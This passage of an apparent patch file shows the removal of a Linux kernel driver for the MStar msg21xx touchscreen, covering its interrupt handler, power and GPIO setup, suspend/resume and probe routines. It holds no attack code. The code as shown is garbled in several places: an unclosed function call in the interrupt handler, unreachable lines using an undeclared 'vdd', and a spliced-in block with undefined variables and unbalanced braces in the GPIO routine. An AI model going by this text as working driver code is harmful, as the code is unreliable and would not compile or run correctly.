--	#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--		else if (bEnableTpProximity && ((data[5] == 0x80) ||
--					(data[5] == 0x40))) {
--			if (data[5] == 0x80)
--				bFaceClosingTp = 1;
--			else if (data[5] == 0x40)
--				bFaceClosingTp = 0;
--
--			return -EINVAL;
--		}
--	#endif
--		else {
--			dev_err(&ts_data->client->dev, "WRONG KEY\n");
--			return -EINVAL;
--		}
--	} else {
--		x = (((data[1] & 0xF0) << 4) | data[2]);
--		y = (((data[1] & 0x0F) << 8) | data[3]);
--		delta_x = (((data[4] & 0xF0) << 4) | data[5]);
--		delta_y = (((data[4] & 0x0F) << 8) | data[6]);
--
--		if ((delta_x == 0) && (delta_y == 0)) {
--			ts_data->info.point[0].x =
--				x * ts_data->pdata->x_max / TPD_WIDTH;
--			ts_data->info.point[0].y =
--				y * ts_data->pdata->y_max / TPD_HEIGHT;
--			ts_data->info.count = 1;
--		} else {
--			if (delta_x > 2048)
--				delta_x -= 4096;
--
--			if (delta_y > 2048)
--				delta_y -= 4096;
--
--			x2 = (unsigned int)((signed short)x +
--						(signed short)delta_x);
--			y2 = (unsigned int)((signed short)y +
--						(signed short)delta_y);
--			ts_data->info.point[0].x =
--				x * ts_data->pdata->x_max / TPD_WIDTH;
--			ts_data->info.point[0].y =
--				y * ts_data->pdata->y_max / TPD_HEIGHT;
--			ts_data->info.point[1].x =
--				x2 * ts_data->pdata->x_max / TPD_WIDTH;
--			ts_data->info.point[1].y =
--				y2 * ts_data->pdata->y_max / TPD_HEIGHT;
--			ts_data->info.count = ts_data->pdata->num_max_touches;
--		}
--	}
--
--	return 0;
--}
--
--static void touch_driver_touch_released(struct msg21xx_ts_data *ts_data)
--{
--	int i;
--
--	for (i = 0; i < ts_data->pdata->num_max_touches; i++) {
--		input_mt_slot(ts_data->input_dev, i);
--		input_mt_report_slot_state(ts_data->input_dev,
--						MT_TOOL_FINGER, 0);
--	}
--
--	input_report_key(ts_data->input_dev, BTN_TOUCH, 0);
--	input_report_key(ts_data->input_dev, BTN_TOOL_FINGER, 0);
--	input_sync(ts_data->input_dev);
--}
--
--/* read data through I2C then report data to input
-- *sub-system when interrupt occurred
-- */
--static irqreturn_t msg21xx_ts_interrupt(int irq, void *dev_id)
--{
--	int i = 0;
--	static int last_keycode = 0xFF;
--	static int last_count;
--	struct msg21xx_ts_data *ts_data = dev_id;
--
--	ts_data->info.count = 0;
--	if (parse_info(ts_data) == 0) {
--		if (ts_data->info.keycode != 0xFF) {   /* key touch pressed */
--			if (ts_data->info.keycode <
--					ts_data->pdata->num_buttons) {
--				if (ts_data->info.keycode != last_keycode) {
--					dev_dbg(&ts_data->client->dev,
--						"key touch pressed");
--
--					input_report_key(ts_data->input_dev,
--							BTN_TOUCH, 1);
--					input_report_key(ts_data->input_dev,
--						ts_data->pdata->button_map[
--						ts_data->info.keycode], 1);
--
--					last_keycode = ts_data->info.keycode;
--				} else {
--					/* pass duplicate key-pressing */
--					dev_dbg(&ts_data->client->dev,
--						"REPEATED KEY\n");
--				}
--			} else {
--				dev_dbg(&ts_data->client->dev, "WRONG KEY\n");
--			}
--		} else {  /* key touch released */
--			if (last_keycode != 0xFF) {
--				dev_dbg(&ts_data->client->dev, "key touch released");
--
--				input_report_key(ts_data->input_dev,
--						BTN_TOUCH, 0);
--				input_report_key(ts_data->input_dev,
--				ts_data->pdata->button_map[last_keycode],
--				0);
--
--				last_keycode = 0xFF;
--			}
--		}
--
--		if (ts_data->info.count > 0) { /* point touch pressed */
--			for (i = 0; i < ts_data->info.count; i++) {
--				input_mt_slot(ts_data->input_dev, i);
--				input_mt_report_slot_state(ts_data->input_dev,
--					MT_TOOL_FINGER, 1);
--				input_report_abs(ts_data->input_dev,
--					ABS_MT_TOUCH_MAJOR, 1);
--				input_report_abs(ts_data->input_dev,
--					ABS_MT_POSITION_X,
--					ts_data->info.point[i].x);
--				input_report_abs(ts_data->input_dev,
--					ABS_MT_POSITION_Y,
--					ts_data->info.point[i].y);
--			}
--		}
--
--		if (last_count > info.count) {
--			for (i = info.count; i < MAX_TOUCH_NUM; i++) {
--				input_mt_slot(input_dev, i);
--				input_mt_report_slot_state(input_dev,
--		}
--
--		if (last_count > ts_data->info.count) {
--			for (i = ts_data->info.count;
--				i < ts_data->pdata->num_max_touches;
--				i++) {
--				input_mt_slot(ts_data->input_dev, i);
--				input_mt_report_slot_state(ts_data->input_dev,
--					MT_TOOL_FINGER, 0);
--			}
--		}
--		last_count = ts_data->info.count;
--
--		input_report_key(ts_data->input_dev, BTN_TOUCH,
--						ts_data->info.count > 0);
--		input_report_key(ts_data->input_dev, BTN_TOOL_FINGER,
--						ts_data->info.count > 0);
--
--		input_sync(ts_data->input_dev);
--	}
--
--	return IRQ_HANDLED;
--}
--
--static int msg21xx_ts_power_init(struct msg21xx_ts_data *ts_data, bool init)
--{
--	int rc;
--
--	if (init) {
--		ts_data->vdd = regulator_get(&ts_data->client->dev,
--									"vdd");
--		if (IS_ERR(ts_data->vdd)) {
--			rc = PTR_ERR(ts_data->vdd);
--			dev_err(&ts_data->client->dev,
--				"Regulator get failed vdd rc=%d\n", rc);
--			return rc;
--		}
--
--		if (regulator_count_voltages(ts_data->vdd) > 0) {
--			rc = regulator_set_voltage(ts_data->vdd,
--							MSTAR_VTG_MIN_UV,
--							MSTAR_VTG_MAX_UV);
--			if (rc) {
--				dev_err(&ts_data->client->dev,
--					"Regulator set_vtg failed vdd rc=%d\n",
--					rc);
--				goto reg_vdd_put;
--			}
--		}
--
--		ts_data->vcc_i2c = regulator_get(&ts_data->client->dev,
--								"vcc_i2c");
--		if (IS_ERR(ts_data->vcc_i2c)) {
--			rc = PTR_ERR(ts_data->vcc_i2c);
--			dev_err(&ts_data->client->dev,
--				"Regulator get failed vcc_i2c rc=%d\n", rc);
--			goto reg_vdd_set_vtg;
--		}
--
--		if (regulator_count_voltages(ts_data->vcc_i2c) > 0) {
--			rc = regulator_set_voltage(ts_data->vcc_i2c,
--						MSTAR_I2C_VTG_MIN_UV,
--						MSTAR_I2C_VTG_MAX_UV);
--			if (rc) {
--				dev_err(&ts_data->client->dev,
--				"Regulator set_vtg failed vcc_i2c rc=%d\n", rc);
--				goto reg_vcc_i2c_put;
--			}
--		}
--	} else {
--		if (regulator_count_voltages(ts_data->vdd) > 0)
--			regulator_set_voltage(ts_data->vdd, 0,
--							MSTAR_VTG_MAX_UV);
--
--		regulator_put(ts_data->vdd);
--
--		if (regulator_count_voltages(ts_data->vcc_i2c) > 0)
--			regulator_set_voltage(ts_data->vcc_i2c, 0,
--						MSTAR_I2C_VTG_MAX_UV);
--
--		regulator_put(ts_data->vcc_i2c);
--	}
--
--	return 0;
--
--reg_vcc_i2c_put:
--	regulator_put(ts_data->vcc_i2c);
--reg_vdd_set_vtg:
--	if (regulator_count_voltages(ts_data->vdd) > 0)
--		regulator_set_voltage(ts_data->vdd, 0, MSTAR_VTG_MAX_UV);
--reg_vdd_put:
--	regulator_put(ts_data->vdd);
--	return rc;
--}
--
--static int msg21xx_ts_power_on(struct msg21xx_ts_data *ts_data, bool on)
--{
--	int rc;
--
--	if (!on)
--		goto power_off;
--
--	rc = regulator_enable(ts_data->vdd);
--	if (rc) {
--		dev_err(&ts_data->client->dev,
--			"Regulator vdd enable failed rc=%d\n", rc);
--		return rc;
--	}
--
--	rc = regulator_enable(ts_data->vcc_i2c);
--	if (rc) {
--		dev_err(&ts_data->client->dev,
--			"Regulator vcc_i2c enable failed rc=%d\n", rc);
--		regulator_disable(ts_data->vdd);
--	}
--
--	return rc;
--
--	DBG("*** %s ***\n", __func__);
--	rc = regulator_disable(vdd);
--power_off:
--	rc = regulator_disable(ts_data->vdd);
--	if (rc) {
--		dev_err(&ts_data->client->dev,
--			"Regulator vdd disable failed rc=%d\n", rc);
--		return rc;
--	}
--
--	rc = regulator_disable(ts_data->vcc_i2c);
--	if (rc) {
--		dev_err(&ts_data->client->dev,
--			"Regulator vcc_i2c disable failed rc=%d\n", rc);
--		rc = regulator_enable(ts_data->vdd);
--	}
--
--	return rc;
--}
--
--static int msg21xx_ts_gpio_configure(struct msg21xx_ts_data *ts_data, bool on)
--{
--	int ret = 0;
--
--	if (!on)
--		goto pwr_deinit;
--
--	if (gpio_is_valid(ts_data->pdata->irq_gpio)) {
--		ret = gpio_request(ts_data->pdata->irq_gpio,
--						"msg21xx_irq_gpio");
--		if (ret) {
--			dev_err(&ts_data->client->dev,
--				"Failed to request GPIO[%d], %d\n",
--				ts_data->pdata->irq_gpio, ret);
--			goto err_irq_gpio_req;
--		}
--		ret = gpio_direction_input(ts_data->pdata->irq_gpio);
--		if (ret) {
--			dev_err(&ts_data->client->dev,
--				"Failed to set direction for gpio[%d], %d\n",
--				ts_data->pdata->irq_gpio, ret);
--			goto err_irq_gpio_dir;
--		}
--		gpio_set_value_cansleep(ts_data->pdata->irq_gpio, 1);
--	} else {
--		dev_err(&ts_data->client->dev, "irq gpio not provided\n");
--		goto err_irq_gpio_req;
--	}
--
--	if (gpio_is_valid(ts_data->pdata->reset_gpio)) {
--		ret = gpio_request(ts_data->pdata->reset_gpio,
--					"msg21xx_reset_gpio");
--		if (ret) {
--			dev_err(&ts_data->client->dev,
--				"Failed to request GPIO[%d], %d\n",
--				ts_data->pdata->reset_gpio, ret);
--			goto err_reset_gpio_req;
--		}
--
--	} else {
--		if (gpio_is_valid(pdata->irq_gpio))
--			gpio_free(pdata->irq_gpio);
--		if (gpio_is_valid(pdata->reset_gpio)) {
--			gpio_set_value_cansleep(pdata->reset_gpio, 0);
--			ret = gpio_direction_input(pdata->reset_gpio);
--			if (ret)
--				dev_err(&i2c_client->dev,
--					"Unable to set direction for gpio [%d]\n",
--					pdata->reset_gpio);
--			gpio_free(pdata->reset_gpio);
--		}
--	}
--	return 0;
--		/* power on TP */
--		ret = gpio_direction_output(
--					ts_data->pdata->reset_gpio, 1);
--		if (ret) {
--			dev_err(&ts_data->client->dev,
--				"Failed to set direction for GPIO[%d], %d\n",
--				ts_data->pdata->reset_gpio, ret);
--			goto err_reset_gpio_dir;
--		}
--		msleep(100);
--		gpio_set_value_cansleep(ts_data->pdata->reset_gpio, 0);
--		msleep(20);
--		gpio_set_value_cansleep(ts_data->pdata->reset_gpio, 1);
--		msleep(200);
--	} else {
--		dev_err(&ts_data->client->dev, "reset gpio not provided\n");
--		goto err_reset_gpio_req;
--	}
--
--	return 0;
--
--err_reset_gpio_dir:
--	if (gpio_is_valid(ts_data->pdata->reset_gpio))
--		gpio_free(ts_data->pdata->irq_gpio);
--err_reset_gpio_req:
--err_irq_gpio_dir:
--	if (gpio_is_valid(ts_data->pdata->irq_gpio))
--		gpio_free(ts_data->pdata->irq_gpio);
--err_irq_gpio_req:
--	return ret;
--
--pwr_deinit:
--	if (gpio_is_valid(ts_data->pdata->irq_gpio))
--		gpio_free(ts_data->pdata->irq_gpio);
--	if (gpio_is_valid(ts_data->pdata->reset_gpio)) {
--		gpio_set_value_cansleep(ts_data->pdata->reset_gpio, 0);
--		ret = gpio_direction_input(ts_data->pdata->reset_gpio);
--		if (ret)
--			dev_err(&ts_data->client->dev,
--				"Unable to set direction for gpio [%d]\n",
--				ts_data->pdata->reset_gpio);
--		gpio_free(ts_data->pdata->reset_gpio);
--	}
--	return 0;
--}
--
--#ifdef CONFIG_PM
--static int msg21xx_ts_resume(struct device *dev)
--{
--	int retval;
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	if (!ts_data->suspended) {
--		dev_info(dev, "msg21xx_ts already in resume\n");
--		return 0;
--	}
--
--	mutex_lock(&ts_data->ts_mutex);
--
--	retval = msg21xx_ts_power_on(ts_data, true);
--	if (retval) {
--		dev_err(dev, "msg21xx_ts power on failed");
--		mutex_unlock(&ts_data->ts_mutex);
--		return retval;
--	}
--
--	if (ts_data->ts_pinctrl) {
--		retval = pinctrl_select_state(ts_data->ts_pinctrl,
--				ts_data->pinctrl_state_active);
--		if (retval < 0) {
--			dev_err(dev, "Cannot get active pinctrl state\n");
--			mutex_unlock(&ts_data->ts_mutex);
--			return retval;
--		}
--	}
--
--	retval = msg21xx_ts_gpio_configure(ts_data, true);
--	if (retval) {
--		dev_err(dev, "Failed to put gpios in active state %d",
--				retval);
--		mutex_unlock(&ts_data->ts_mutex);
--		return retval;
--	}
--
--	enable_irq(ts_data->client->irq);
--	ts_data->suspended = false;
--
--	mutex_unlock(&ts_data->ts_mutex);
--
--	return 0;
--}
--
--static int msg21xx_ts_suspend(struct device *dev)
--{
--	int retval;
--	struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
--	if (ts_data->pdata->updating_fw) {
--		dev_info(dev, "Firmware loading in progress\n");
--		return 0;
--	}
--
--	if (ts_data->suspended) {
--		dev_info(dev, "msg21xx_ts already in suspend\n");
--		return 0;
--	}
--
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--	if (bEnableTpProximity) {
--		dev_dbg(dev, "suspend bEnableTpProximity=%d\n",
--				bEnableTpProximity);
--		return 0;
--	}
--#endif
--
--	mutex_lock(&ts_data->ts_mutex);
--
--	disable_irq(ts_data->client->irq);
--
--	touch_driver_touch_released(ts_data);
--
--	if (ts_data->ts_pinctrl) {
--		retval = pinctrl_select_state(ts_data->ts_pinctrl,
--				ts_data->pinctrl_state_suspend);
--		if (retval < 0) {
--			dev_err(dev, "Cannot get idle pinctrl state %d\n",
--				retval);
--			mutex_unlock(&ts_data->ts_mutex);
--			return retval;
--		}
--	}
--
--	retval = msg21xx_ts_gpio_configure(ts_data, false);
--	if (retval) {
--		dev_err(dev, "Failed to put gpios in idle state %d",
--				retval);
--		mutex_unlock(&ts_data->ts_mutex);
--		return retval;
--	}
--
--	retval = msg21xx_ts_power_on(ts_data, false);
--	if (retval) {
--		dev_err(dev, "msg21xx_ts power off failed");
--		mutex_unlock(&ts_data->ts_mutex);
--		return retval;
--	}
--
--	ts_data->suspended = true;
--
--	mutex_unlock(&ts_data->ts_mutex);
--
--	return 0;
--}
--#else
--static int msg21xx_ts_resume(struct device *dev)
--{
--	return 0;
--}
--static int msg21xx_ts_suspend(struct device *dev)
--{
--	return 0;
--}
--#endif
--
--static int msg21xx_debug_suspend_set(void *_data, u64 val)
--{
--	struct msg21xx_ts_data *data = _data;
--
--	mutex_lock(&data->input_dev->mutex);
--
--	if (val)
--		msg21xx_ts_suspend(&data->client->dev);
--	else
--		msg21xx_ts_resume(&data->client->dev);
--
--	mutex_unlock(&data->input_dev->mutex);
--
--	return 0;
--}
--
--static int msg21xx_debug_suspend_get(void *_data, u64 *val)
--{
--	struct msg21xx_ts_data *data = _data;
--
--	mutex_lock(&data->input_dev->mutex);
--	*val = data->suspended;
--	mutex_unlock(&data->input_dev->mutex);
--
--	return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(debug_suspend_fops, msg21xx_debug_suspend_get,
--			msg21xx_debug_suspend_set, "%lld\n");
--
--
--#if defined(CONFIG_FB)
--static int fb_notifier_callback(struct notifier_block *self,
--				unsigned long event, void *data)
--{
--	struct fb_event *evdata = data;
--	int *blank;
--	struct msg21xx_ts_data *ts_data =
--		container_of(self, struct msg21xx_ts_data, fb_notif);
--
--	if (evdata && evdata->data && event == FB_EVENT_BLANK) {
--		blank = evdata->data;
--		if (*blank == FB_BLANK_UNBLANK)
--			msg21xx_ts_resume(&ts_data->client->dev);
--		else if (*blank == FB_BLANK_POWERDOWN)
--			msg21xx_ts_suspend(&ts_data->client->dev);
--	}
--
--	return 0;
--}
--#endif
--
--static int msg21xx_get_dt_coords(struct device *dev, char *name,
--				struct msg21xx_ts_platform_data *pdata)
--{
--	u32 coords[FT_COORDS_ARR_SIZE];
--	struct property *prop;
--	struct device_node *np = dev->of_node;
--	int coords_size, rc;
--
--	prop = of_find_property(np, name, NULL);
--	if (!prop)
--		return -EINVAL;
--	if (!prop->value)
--		return -ENODATA;
--
--	coords_size = prop->length / sizeof(u32);
--	if (coords_size != FT_COORDS_ARR_SIZE) {
--		dev_err(dev, "invalid %s\n", name);
--		return -EINVAL;
--	}
--
--	rc = of_property_read_u32_array(np, name, coords, coords_size);
--	if (rc && (rc != -EINVAL)) {
--		dev_err(dev, "Unable to read %s\n", name);
--		return rc;
--	}
--
--	if (!strcmp(name, "mstar,panel-coords")) {
--		pdata->panel_minx = coords[0];
--		pdata->panel_miny = coords[1];
--		pdata->panel_maxx = coords[2];
--		pdata->panel_maxy = coords[3];
--	} else if (!strcmp(name, "mstar,display-coords")) {
--		pdata->x_min = coords[0];
--		pdata->y_min = coords[1];
--		pdata->x_max = coords[2];
--		pdata->y_max = coords[3];
--	} else {
--		dev_err(dev, "unsupported property %s\n", name);
--		return -EINVAL;
--	}
--
--	return 0;
--}
--
--static int msg21xx_parse_dt(struct device *dev,
--			struct msg21xx_ts_platform_data *pdata)
--{
--	int rc;
--	struct device_node *np = dev->of_node;
--	struct property *prop;
--	u32 temp_val;
--
--	rc = msg21xx_get_dt_coords(dev, "mstar,panel-coords", pdata);
--	if (rc && (rc != -EINVAL))
--		return rc;
--
--	rc = msg21xx_get_dt_coords(dev, "mstar,display-coords", pdata);
--	if (rc)
--		return rc;
--
--	rc = of_property_read_u32(np, "mstar,hard-reset-delay-ms",
--							&temp_val);
--	if (!rc)
--		pdata->hard_reset_delay_ms = temp_val;
--	else
--		return rc;
--
--	rc = of_property_read_u32(np, "mstar,post-hard-reset-delay-ms",
--							&temp_val);
--	if (!rc)
--		pdata->post_hard_reset_delay_ms = temp_val;
--	else
--		return rc;
--
--	/* reset, irq gpio info */
--	pdata->reset_gpio = of_get_named_gpio_flags(np, "mstar,reset-gpio",
--				0, &pdata->reset_gpio_flags);
--	if (pdata->reset_gpio < 0)
--		return pdata->reset_gpio;
--
--	pdata->irq_gpio = of_get_named_gpio_flags(np, "mstar,irq-gpio",
--				0, &pdata->irq_gpio_flags);
--	if (pdata->irq_gpio < 0)
--		return pdata->irq_gpio;
--
--	rc = of_property_read_u32(np, "mstar,ic-type", &temp_val);
--	if (rc && (rc != -EINVAL))
--		return rc;
--
--	pdata->ic_type = temp_val;
--
--	rc = of_property_read_u32(np, "mstar,num-max-touches", &temp_val);
--	if (!rc)
--		pdata->num_max_touches = temp_val;
--	else
--		return rc;
--
--	prop = of_find_property(np, "mstar,button-map", NULL);
--	if (prop) {
--		pdata->num_buttons = prop->length / sizeof(temp_val);
--		if (pdata->num_buttons > MAX_BUTTONS)
--			return -EINVAL;
--
--		rc = of_property_read_u32_array(np,
--			"mstar,button-map", pdata->button_map,
--			pdata->num_buttons);
--		if (rc) {
--			dev_err(dev, "Unable to read key codes\n");
--			return rc;
--		}
--	}
--
--	return 0;
--}
--
--/* probe function is used for matching and initializing input device */
--static int msg21xx_ts_probe(struct i2c_client *client,
--		const struct i2c_device_id *id) {
--
--	int ret = 0, i;
--	struct dentry *temp, *dir;
--	struct input_dev *input_dev;
--	struct msg21xx_ts_data *ts_data;
--	struct msg21xx_ts_platform_data *pdata;
--
--	if (client->dev.of_node) {
--		pdata = devm_kzalloc(&client->dev,
--			sizeof(struct msg21xx_ts_platform_data), GFP_KERNEL);
--		if (!pdata)
--			return -ENOMEM;
--
--		ret = msg21xx_parse_dt(&client->dev, pdata);
--		if (ret) {
--			dev_err(&client->dev, "DT parsing failed\n");
--			return ret;
--		}
--	} else
--		pdata = client->dev.platform_data;
--
--	if (!i2c_check_functionality(client->adapter, I2C_FUNC_I2C)) {
--		dev_err(&client->dev, "I2C not supported\n");
--		return -ENODEV;
--	}
--
--	ts_data = devm_kzalloc(&client->dev,
--			sizeof(struct msg21xx_ts_data), GFP_KERNEL);
--	if (!ts_data)
--		return -ENOMEM;
--
--	ts_data->client = client;
--	ts_data->info.point = devm_kzalloc(&client->dev,
--		sizeof(struct touchPoint_t) * pdata->num_max_touches,
--		GFP_KERNEL);
--	if (!ts_data->info.point) {
--		dev_err(&client->dev, "Not enough memory\n");
--		return -ENOMEM;
--	}
--
--	/* allocate an input device */
--	input_dev = input_allocate_device();
--	if (!input_dev) {
--		ret = -ENOMEM;
--		dev_err(&client->dev, "input device allocation failed\n");
--		goto err_input_allocate_dev;
--	}
--
--	input_dev->name = client->name;
--	input_dev->phys = "I2C";
--	input_dev->dev.parent = &client->dev;
--	input_dev->id.bustype = BUS_I2C;
--
--	ts_data->input_dev = input_dev;
--	ts_data->client = client;
--	ts_data->pdata = pdata;
--
--	input_set_drvdata(input_dev, ts_data);
--	i2c_set_clientdata(client, ts_data);
--
--	ret = msg21xx_ts_power_init(ts_data, true);
--	if (ret) {
--		dev_err(&client->dev, "Mstar power init failed\n");
--		return ret;
--	}
--
--	ret = msg21xx_ts_power_on(ts_data, true);
--	if (ret) {
--		dev_err(&client->dev, "Mstar power on failed\n");
--		goto exit_deinit_power;
--	}
--
--	ret = msg21xx_pinctrl_init(ts_data);
--	if (!ret && ts_data->ts_pinctrl) {
--		/*
--		* Pinctrl handle is optional. If pinctrl handle is found
--		* let pins to be configured in active state. If not
--		* found continue further without error.
--		*/
--		ret = pinctrl_select_state(ts_data->ts_pinctrl,
--				ts_data->pinctrl_state_active);
--		if (ret < 0)
--			dev_err(&client->dev,
--				"Failed to select %s pinatate %d\n",
--				PINCTRL_STATE_ACTIVE, ret);
--	}
--
--	ret = msg21xx_ts_gpio_configure(ts_data, true);
--	if (ret) {
--		dev_err(&client->dev, "Failed to configure gpio %d\n", ret);
--		goto exit_gpio_config;
--	}
--
--	if (msg21xx_get_ic_type(ts_data) == 0) {
--		dev_err(&client->dev, "The current IC is not Mstar\n");
--		ret = -1;
--		goto err_wrong_ic_type;
--	}
--
--	mutex_init(&msg21xx_mutex);
--	mutex_init(&ts_data->ts_mutex);
--
--	/* set the supported event type for input device */
--	set_bit(EV_ABS, input_dev->evbit);
--	set_bit(EV_SYN, input_dev->evbit);
--	set_bit(EV_KEY, input_dev->evbit);
--	set_bit(BTN_TOUCH, input_dev->keybit);
--	set_bit(BTN_TOOL_FINGER, input_dev->keybit);
--	set_bit(INPUT_PROP_DIRECT, input_dev->propbit);
--
--	for (i = 0; i < pdata->num_buttons; i++)
--		input_set_capability(input_dev, EV_KEY, pdata->button_map[i]);
--
--	input_set_drvdata(input_dev, ts_data);
--	i2c_set_clientdata(client, ts_data);
--
--#ifdef CONFIG_TP_HAVE_KEY
--	{
--		int i;
--
--		for (i = 0; i < num_buttons; i++)
--			input_set_capability(input_dev, EV_KEY, button_map[i]);
--	}
--#endif
--
--	input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR,
--				0, 2, 0, 0);
--	input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, 0, 2, 0, 0);
--	input_set_abs_params(input_dev, ABS_MT_POSITION_X,
--			0, pdata->x_max, 0, 0);
--	input_set_abs_params(input_dev, ABS_MT_POSITION_Y,
--			0, pdata->y_max, 0, 0);
--	ret = input_mt_init_slots(input_dev,  pdata->num_max_touches, 0);
--	if (ret) {
--		dev_err(&client->dev,
--			"Error %d initialising slots\n", ret);
--		goto err_free_mem;
--	}
--
--	/* register the input device to input sub-system */
--	ret = input_register_device(input_dev);
--	if (ret < 0) {
--		dev_err(&client->dev,
--			"Unable to register ms-touchscreen input device\n");
--		goto err_input_reg_dev;
--	}
--
--	/* version */
--	if (device_create_file(&client->dev, &dev_attr_version) < 0) {
--		dev_err(&client->dev,
--			"Failed to create device file(%s)!\n",
--			dev_attr_version.attr.name);
--		goto err_create_fw_ver_file;
--	}
--	/* update */
--	if (device_create_file(&client->dev, &dev_attr_update) < 0) {
--		dev_err(&client->dev,
--			"Failed to create device file(%s)!\n",
--			dev_attr_update.attr.name);
--		goto err_create_fw_update_file;
--	}
--	/* data */
--	if (device_create_file(&client->dev, &dev_attr_data) < 0) {
--		dev_err(&client->dev,
--			"Failed to create device file(%s)!\n",
--			dev_attr_data.attr.name);
--		goto err_create_fw_data_file;
--	}
--	/* fw name */
--	if (device_create_file(&client->dev, &dev_attr_fw_name) < 0) {
--		dev_err(&client->dev,
--			"Failed to create device file(%s)!\n",
--			dev_attr_fw_name.attr.name);
--		goto err_create_fw_name_file;
--	}
--	/* smart fw update */
--	if (device_create_file(&client->dev, &dev_attr_update_fw) < 0) {
--		dev_err(&client->dev,
--			"Failed to create device file(%s)!\n",
--			dev_attr_update_fw.attr.name);
--		goto err_create_update_fw_file;
--	}
--	/* smart fw force update */
--	if (device_create_file(&client->dev,
--					&dev_attr_force_update_fw) < 0) {
--		dev_err(&client->dev,
--			"Failed to create device file(%s)!\n",
--			dev_attr_force_update_fw.attr.name);
--		goto err_create_force_update_fw_file;
--	}
--	dir = debugfs_create_dir(MSTAR_DEBUG_DIR_NAME, NULL);
--	temp = debugfs_create_file("suspend", S_IRUSR | S_IWUSR, dir,
--					ts_data, &debug_suspend_fops);
--	if (temp == NULL || IS_ERR(temp)) {
--		dev_err(&client->dev,
--			"debugfs_create_file failed: rc=%ld\n", PTR_ERR(temp));
--		goto free_debug_dir;
--	}
--
--#ifdef TP_PRINT
--	tp_print_create_entry(ts_data);
--#endif
--
--	ret = request_threaded_irq(client->irq, NULL,
--				msg21xx_ts_interrupt,
--				pdata->irq_gpio_flags | IRQF_ONESHOT,
--				"msg21xx", ts_data);
--	if (ret)
--		goto err_req_irq;
--
--	disable_irq(client->irq);
--
--#if defined(CONFIG_FB)
--	ts_data->fb_notif.notifier_call = fb_notifier_callback;
--	ret = fb_register_client(&ts_data->fb_notif);
--#endif
--
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
--	tsps_assist_register_callback("msg21xx", &tsps_msg21xx_enable,
--				&tsps_msg21xx_data);
--#endif
--
--	dev_dbg(&client->dev, "mstar touch screen registered\n");
--	enable_irq(client->irq);
--	return 0;
--
--err_req_irq:
--	free_irq(client->irq, ts_data);
--	device_remove_file(&client->dev, &dev_attr_data);
--free_debug_dir:
--	debugfs_remove_recursive(dir);
--err_create_fw_data_file:
--	device_remove_file(&client->dev, &dev_attr_update);
--err_create_fw_update_file:
--	device_remove_file(&client->dev, &dev_attr_version);
--err_create_fw_name_file:
--	device_remove_file(&client->dev, &dev_attr_fw_name);
--err_create_update_fw_file:
--	device_remove_file(&client->dev, &dev_attr_update_fw);
--err_create_force_update_fw_file:
--	device_remove_file(&client->dev, &dev_attr_force_update_fw);
--err_create_fw_ver_file:
--	input_unregister_device(input_dev);
--
--err_input_reg_dev:
--	input_free_device(input_dev);
--	input_dev = NULL;
--err_input_allocate_dev:
--	mutex_destroy(&msg21xx_mutex);
--	mutex_destroy(&ts_data->ts_mutex);
--
--err_wrong_ic_type:
--	msg21xx_ts_gpio_configure(ts_data, false);
--exit_gpio_config:
--	if (ts_data->ts_pinctrl) {
--		if (IS_ERR_OR_NULL(ts_data->pinctrl_state_release)) {
--			devm_pinctrl_put(ts_data->ts_pinctrl);
--			ts_data->ts_pinctrl = NULL;
--		} else {
--			ret = pinctrl_select_state(ts_data->ts_pinctrl,
--					ts_data->pinctrl_state_release);
--			if (ret < 0)
--				dev_err(&ts_data->client->dev,
--					"Cannot get release pinctrl state\n");
--		}
--	}
--	msg21xx_ts_power_on(ts_data, false);
--exit_deinit_power:
--	msg21xx_ts_power_init(ts_data, false);
--err_free_mem:
--	input_free_device(input_dev);
--
--	return ret;
--}
--
--/* remove function is triggered when the input device is removed
-- *from input sub-system
-- */
--static int touch_driver_remove(struct i2c_client *client)
--{
--	int retval = 0;
--	struct msg21xx_ts_data *ts_data = i2c_get_clientdata(client);
--
--	free_irq(ts_data->client->irq, ts_data);
--	gpio_free(ts_data->pdata->irq_gpio);
--	gpio_free(ts_data->pdata->reset_gpio);
--
--	if (ts_data->ts_pinctrl) {
--		if (IS_ERR_OR_NULL(ts_data->pinctrl_state_release)) {
--			devm_pinctrl_put(ts_data->ts_pinctrl);
--			ts_data->ts_pinctrl = NULL;
--		} else {
--			retval = pinctrl_select_state(ts_data->ts_pinctrl,
--					ts_data->pinctrl_state_release);
--			if (retval < 0)
--				dev_err(&ts_data->client->dev,
--					"Cannot get release pinctrl state\n");
--		}
--	}
--
--	input_unregister_device(ts_data->input_dev);
--	mutex_destroy(&msg21xx_mutex);
--	mutex_destroy(&ts_data->ts_mutex);
--
--	return retval;
--}
--
--/* The I2C device list is used for matching I2C device
-- *and I2C device driver.
-- */
--static const struct i2c_device_id touch_device_id[] = {
--	{"msg21xx", 0},
--	{}, /* should not omitted */
--};
--
--static const struct of_device_id msg21xx_match_table[] = {
--	{ .compatible = "mstar,msg21xx", },
--	{ },
--};
--
--MODULE_DEVICE_TABLE(i2c, touch_device_id);
--
--static struct i2c_driver touch_device_driver = {
--	.driver = {
--		.name = "ms-msg21xx",
--		.owner = THIS_MODULE,
--		.of_match_table = msg21xx_match_table,
--	},
--	.probe = msg21xx_ts_probe,
--	.remove = touch_driver_remove,
--	.id_table = touch_device_id,
--};
--
--module_i2c_driver(touch_device_driver);
--
--#ifdef TP_PRINT
--#include <linux/proc_fs.h>
--
--static unsigned short InfoAddr = 0x0F, PoolAddr = 0x10, TransLen = 256;
--static unsigned char row, units, cnt;
--
--static int tp_print_proc_read(struct msg21xx_ts_data *ts_data)
--{
--	unsigned short i, j;
--	unsigned short left, offset = 0;
--	unsigned char dbbus_tx_data[3] = {0};
--	unsigned char u8Data;
--	signed short s16Data;
--	int s32Data;
--	char *buf = NULL;
--
--	left = cnt*row*units;
--	if ((ts_data->suspended == 0) &&
--				(InfoAddr != 0x0F) &&
--				(PoolAddr != 0x10) &&
--				(left > 0)) {
--		buf = kmalloc(left, GFP_KERNEL);
--		if (buf != NULL) {
--
--			while (left > 0) {
--				dbbus_tx_data[0] = 0x53;
